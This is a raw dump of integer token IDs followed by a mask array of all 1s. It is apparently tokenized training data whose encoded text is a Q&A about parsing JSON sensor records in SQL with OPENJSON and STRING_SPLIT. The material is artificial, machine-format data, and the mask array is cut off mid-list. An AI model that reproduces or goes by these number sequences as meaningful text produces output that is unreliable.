29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2481, 1551, 317, 3466, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26433, 7698, 448, 341, 566, 16843, 4794, 802, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26433, 7698, 448, 341, 566, 16843, 4794, 802, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29956, 1161, 449, 383, 7168, 1115, 29871, 29946, 29889, 29896, 29953, 29955, 29900, 29900, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29956, 1161, 449, 383, 7168, 5190, 1115, 12633, 13, 29871, 376, 11501, 1204, 1115, 376, 5461, 292, 10141, 613, 13, 29871, 376, 2624, 2369, 802, 6742, 29965, 14246, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29906, 29896, 29889, 29945, 29941, 29896, 29900, 29900, 29900, 29900, 29999, 613, 13, 29871, 376, 2624, 7032, 287, 29965, 14246, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29941, 29945, 29889, 29953, 29947, 29953, 29947, 29941, 29906, 29929, 29999, 613, 13, 29871, 376, 29902, 29877, 4690, 431, 1115, 426, 13, 1678, 376, 5350, 11501, 5631, 362, 1204, 1115, 376, 29953, 29941, 29955, 29896, 29929, 29929, 29947, 29900, 29896, 29953, 29896, 29955, 29941, 29906, 29900, 29953, 29929, 29900, 613, 13, 1678, 376, 5350, 11501, 1204, 1115, 376, 5461, 292, 10141, 613, 13, 1678, 376, 12521, 23445, 1204, 1115, 1870, 29892, 13, 1678, 376, 2369, 802, 6742, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29906, 29896, 29889, 29900, 29900, 29900, 29900, 29900, 29900, 29900, 613, 13, 1678, 376, 3728, 1204, 1115, 1870, 29892, 13, 1678, 376, 3835, 1204, 1115, 1870, 13, 29871, 2981, 13, 29871, 376, 7439, 654, 1204, 1115, 29871, 29896, 29892, 13, 29871, 376, 27939, 1115, 376, 29906, 29900, 29896, 29929, 29899, 29896, 29900, 29899, 29941, 29900, 29871, 29896, 29941, 29901, 29946, 29947, 29901, 29900, 29945, 29889, 29900, 29900, 29900, 29900, 29900, 29900, 29908, 13, 29913, 13, 13, 29908, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29908, 338, 385, 1203, 1024, 29936, 1269, 4663, 338, 363, 263, 2323, 1203, 29889, 13, 29908, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2882, 29906, 1334, 523, 373, 18531, 29908, 338, 278, 5183, 1134, 29892, 13674, 1754, 701, 310, 10522, 29896, 29889, 8176, 29906, 29889, 13, 1576, 1833, 760, 310, 278, 1948, 338, 278, 5183, 995, 29889, 13, 1576, 14334, 472, 278, 5970, 310, 278, 4663, 338, 278, 5183, 931, 29889, 13, 4013, 4004, 338, 451, 3734, 29901, 13, 13, 29871, 376, 11501, 1204, 1115, 376, 5461, 292, 10141, 613, 13, 29871, 376, 2624, 2369, 802, 6742, 29965, 14246, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29906, 29896, 29889, 29945, 29941, 29896, 29900, 29900, 29900, 29900, 29999, 613, 13, 29871, 376, 2624, 7032, 287, 29965, 14246, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29941, 29945, 29889, 29953, 29947, 29953, 29947, 29941, 29906, 29929, 29999, 613, 13, 29871, 376, 29902, 29877, 4690, 431, 1115, 426, 13, 1678, 376, 5350, 11501, 5631, 362, 1204, 1115, 376, 29953, 29941, 29955, 29896, 29929, 29929, 29947, 29900, 29896, 29953, 29896, 29955, 29941, 29906, 29900, 29953, 29929, 29900, 613, 13, 1678, 376, 5350, 11501, 1204, 1115, 376, 5461, 292, 10141, 613, 13, 1678, 376, 12521, 23445, 1204, 1115, 1870, 29892, 13, 1678, 376, 2369, 802, 6742, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29906, 29896, 29889, 29900, 29900, 29900, 29900, 29900, 29900, 29900, 613, 13, 1678, 376, 3728, 1204, 1115, 1870, 29892, 13, 1678, 376, 3835, 1204, 1115, 1870, 13, 29871, 2981, 13, 29871, 376, 7439, 654, 1204, 1115, 29871, 29896, 29892, 13, 13, 2744, 10839, 1962, 363, 445, 848, 723, 367, 29901, 13, 13, 6246, 925, 2805, 1554, 763, 445, 723, 367, 2289, 8444, 29901, 13, 13, 25271, 366, 363, 596, 1371, 29991, 13, 13, 29909, 29901, 13, 13, 7900, 9929, 393, 278, 3734, 6611, 674, 2337, 505, 29871, 29941, 3785, 29899, 25048, 630, 7117, 29892, 278, 1494, 508, 367, 697, 883, 310, 1650, 29901, 13, 13, 15922, 267, 278, 383, 29931, 1299, 29911, 1430, 1591, 740, 304, 2125, 738, 478, 1718, 29902, 13566, 13033, 1897, 515, 263, 1591, 313, 29896, 29899, 798, 4868, 297, 1342, 29897, 322, 3902, 356, 372, 964, 2999, 4206, 13, 9662, 583, 373, 278, 5759, 3446, 3235, 1897, 313, 3166, 278, 383, 29931, 1299, 29911, 1430, 1591, 29897, 304, 20076, 263, 1948, 29899, 23362, 995, 313, 27939, 29897, 363, 1432, 3902, 6797, 1948, 13, 15922, 267, 263, 6058, 2672, 4175, 304, 19060, 18500, 9714, 1820, 2983, 13, 15922, 267, 278, 317, 7390, 1806, 740, 411, 16285, 304, 16429, 278, 23892, 1820, 964, 2999, 4341, 13, 13, 6404, 13, 29871, 317, 7390, 1806, 29898, 10818, 29892, 15300, 29861, 29900, 29962, 3339, 376, 2061, 4408, 29908, 13, 29892, 317, 7390, 1806, 29898, 10818, 29892, 15300, 29861, 29896, 29962, 3339, 376, 8176, 29871, 29896, 29908, 13, 29892, 317, 7390, 1806, 29898, 10818, 29892, 15300, 29861, 29906, 29962, 3339, 376, 8176, 29871, 29906, 29908, 13, 29892, 12599, 4462, 3339, 376, 1917, 29908, 13, 29892, 3446, 3235, 29901, 27939, 1057, 15307, 1254, 19297, 3339, 376, 27939, 29908, 13, 21482, 10911, 29898, 10536, 1299, 29911, 1430, 29898, 16320, 1660, 29918, 7249, 877, 13, 29912, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2882, 29906, 1334, 523, 373, 18531, 1115, 29871, 29900, 29889, 29906, 29955, 29896, 29946, 29945, 29955, 29906, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2882, 29906, 1334, 523, 373, 18531, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 360, 2593, 5254, 402, 475, 10937, 1115, 29871, 29900, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 360, 2593, 5254, 402, 475, 10937, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 390, 4590, 1115, 29871, 29900, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 390, 4590, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 27065, 630, 7362, 412, 3295, 29886, 9552, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 27065, 630, 7362, 412, 3295, 29886, 9552, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29907, 398, 28524, 360, 2554, 3295, 29886, 9552, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29907, 398, 28524, 360, 2554, 3295, 29886, 9552, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26453, 317, 13308, 751, 2877, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26453, 317, 13308, 751, 2877, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29954, 29956, 5746, 21029, 17907, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29954, 29956, 5746, 21029, 17907, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3580, 29941, 29918, 1254, 29968, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3580, 29941, 29918, 1254, 29968, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 7982, 2994, 276, 428, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 7982, 2994, 276, 428, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29925, 277, 29871, 29896, 29896, 435, 17204, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29925, 277, 29871, 29896, 29896, 435, 17204, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29366, 448, 396, 29896, 9897, 5974, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29366, 448, 396, 29896, 9897, 5974, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29906, 29918, 29963, 5607, 1115, 29871, 29947, 29889, 29955, 29941, 29906, 29955, 29946, 29941, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29906, 29918, 29963, 5607, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29946, 29918, 29963, 5607, 1115, 29871, 29896, 29953, 29889, 29896, 29941, 29896, 29900, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29946, 29918, 29963, 5607, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2481, 1551, 317, 3466, 1115, 29871, 29896, 29889, 29941, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2481, 1551, 317, 3466, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26433, 7698, 448, 341, 566, 16843, 4794, 802, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26433, 7698, 448, 341, 566, 16843, 4794, 802, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29956, 1161, 449, 383, 7168, 1115, 29871, 29946, 29889, 29896, 29953, 29955, 29900, 29900, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29956, 1161, 449, 383, 7168, 5190, 1115, 12633, 13, 29871, 376, 11501, 1204, 1115, 376, 5461, 292, 10141, 613, 13, 29871, 376, 2624, 2369, 802, 6742, 29965, 14246, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29906, 29896, 29889, 29945, 29941, 29896, 29900, 29900, 29900, 29900, 29999, 613, 13, 29871, 376, 2624, 7032, 287, 29965, 14246, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29941, 29945, 29889, 29953, 29947, 29953, 29947, 29941, 29906, 29929, 29999, 613, 13, 29871, 376, 29902, 29877, 4690, 431, 1115, 426, 13, 1678, 376, 5350, 11501, 5631, 362, 1204, 1115, 376, 29953, 29941, 29955, 29896, 29929, 29929, 29947, 29900, 29896, 29953, 29896, 29955, 29941, 29906, 29900, 29953, 29929, 29900, 613, 13, 1678, 376, 5350, 11501, 1204, 1115, 376, 5461, 292, 10141, 613, 13, 1678, 376, 12521, 23445, 1204, 1115, 1870, 29892, 13, 1678, 376, 2369, 802, 6742, 2481, 1115, 376, 29906, 29900, 29906, 29900, 29899, 29900, 29945, 29899, 29900, 29946, 29911, 29906, 29906, 29901, 29896, 29906, 29901, 29906, 29896, 29889, 29900, 29900, 29900, 29900, 29900, 29900, 29900, 613, 13, 1678, 376, 3728, 1204, 1115, 1870, 29892, 13, 1678, 376, 3835, 1204, 1115, 1870, 13, 29871, 2981, 13, 29871, 376, 7439, 654, 1204, 1115, 29871, 29896, 29892, 13, 29871, 376, 27939, 1115, 376, 29906, 29900, 29896, 29929, 29899, 29896, 29900, 29899, 29941, 29900, 29871, 29896, 29941, 29901, 29946, 29947, 29901, 29900, 29945, 29889, 29900, 29900, 29900, 29900, 29900, 29900, 29908, 13, 29913, 13, 29915, 4961, 13, 22043, 13, 29871, 14636, 6058, 2672, 6702, 11501, 1204, 742, 525, 29902, 29877, 4690, 431, 742, 525, 7439, 654, 1204, 742, 525, 27939, 742, 525, 2624, 2369, 802, 6742, 29965, 14246, 2481, 742, 525, 2624, 7032, 287, 29965, 14246, 2481, 2157, 13, 13, 4013, 881, 7738, 263, 1121, 2788, 304, 596, 937, 17286, 29901, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 